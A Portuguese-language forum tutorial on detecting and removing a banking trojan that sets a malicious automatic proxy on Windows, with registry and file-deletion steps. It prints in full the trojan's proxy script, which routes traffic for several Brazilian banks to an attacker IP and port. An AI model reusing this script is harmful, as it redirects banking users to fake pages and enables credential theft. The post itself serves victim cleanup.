Entrar
Cadastre-se
Bom primeiramente olá a todos a algum tempo não vinha com novos tutoriais até porque não tenho idéa o que posso fazer,vou postar aqui um
Tutorial de como remover um Vírus de Proxy automatica que hackers Brasileiros andam usando,lembrando que nenhum anti-vírus foi capaz de
detectar este maldito..
DETECTANDO:
Bom o vírus é extremamente fácil de pegar,pode pega-lo até pelo navegador através de um Javascript que fizeram para mudar as cofigurações
do registro..
INICIAR
PAINEL DE CONTROLE
OPÇÕES DA INTERNET
Aba CONEXÕES
CONFIGURAÇÕES DA LAN
Você verá algo parecido com Isto:
Bom caso você esteja infectado é provável que aparece uma Proxy no local Endereço,caso realmente estiver pegue aquela URL cole no
navegador e entre na pagina,verá um código JS parecido com Esse:
function FindProxyForURL(url, host)
{
var a = "PROXY 94.103.152.250:8083";
if (shExpMatch(host, "www.unibanco.com.br")) {
return a;
}
if (shExpMatch(host, "unibanco.com.br")) {
return a;
}
if (shExpMatch(host, "www.bradesco.com.br")) {
return a;
}
if (shExpMatch(host, "bradesco.com.br")) {
return a;
}
if (shExpMatch(host, "bradescoprime.com.br")) {
return a;
}
if (shExpMatch(host, "www.bradescoprime.com.br")) {
return a;
}
if (shExpMatch(host, "www.santander.com.br")) {
return a;
}
if (shExpMatch(host, "santander.com.br")) {
return a;
}
if (shExpMatch(host, "www.santanderbanespa.com.br")) {
return a;
}
if (shExpMatch(host, "www.banespa.com.br")) {
return a;
}
if (shExpMatch(host, "banespa.com.br")) {
return a;
}
if (shExpMatch(host, "www.itau.com.br")) {
return a;
}
if (shExpMatch(host, "itau.com.br")) {
return a;
}
if (shExpMatch(host, "real.com.br")) {
return a;
}
if (shExpMatch(host, "bancoreal.com.br")) {
return a;
}
if (shExpMatch(host, "www.real.com.br")) {
return a;
}
if (shExpMatch(host, "www.bancoreal.com.br")) {
return a;
}
return "DIRECT";
}
Como podem ver ao o JS achar uma Pagina de banco redireciona a uma Falsa caso você estiver com esta pagina faça o processedimento
abaixo e claro denuncie a DNS e o IP que tem esse código malicioso
REMOVENDO
Bom para remover é realmente chato,mesmo assim vou tentar dar um explicada Rapida..
INICIAR
EXECUTAR
Digite REGEDIT
Lá tera as Opções de Registro pegue e navegue até a chave:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Clicando na Chave Internet Settings,terá alguns Registro procure pelo registro no qual tem o valor da Prox Infectada,isto é
Caso tenha o a Proxy Exemplo: "dns.cache.org" você deverá procurar algo do tipo dentro desta Chave
Após encontrar exclua esta chave,não haverá efeitos colaterais até porque o Windows Recria ela novamente..
Após todo esse Processo vá novamente em:
INICIAR
EXECUTAR
Digite: %UserProfile%
Abrirá uma Pasta dentro desta pasta procure por um desses arquivos
internetmodule.dll networkmap.dll sysquery.dll systemmap.dll undersystem.dll userprofile.dll winprocess32.dll winupdate32.dll
Delete-os,normalmente eles estarão sendo usado pelo run32.dll simplesmente baixe o Unlocker
http://www.baixaki.c...ad/unlocker.htm
E Clique com botão direito no arquivo UNLOCKER e escolha a Opção deletar..
Logo Após fazer isso baixe a ferramenta BankerFix da comunidade LinhaDefensiva
http://www.linhadefe...rg/dl/bankerfix
Abra ele e Feche todos programas executados no momento,deixe ele aberto e siga os passos clicando Enter em questão de 2 (dois) minutos ele dará como processo executado..
Reinicie o Computador e volte feliz sem esse Trojan chato que rouba informações,fiquei por 1 semana com ele em meu computador,sorte que o banco de minha mãe é o Banrisul,rs..
Obrigado a todos qualquer dúvida poste Abaixo,Agradecer não custa Nada
Agradecimentos à:
http://www.linhadefe...ies-maliciosos/
http://threatpost.co...avegador-040910
Grato..
Att: DraKiNs
P.S: Desculpa se postei na área errada,a proposito o BankerFix não remove o Vírus
Voltar para o topo
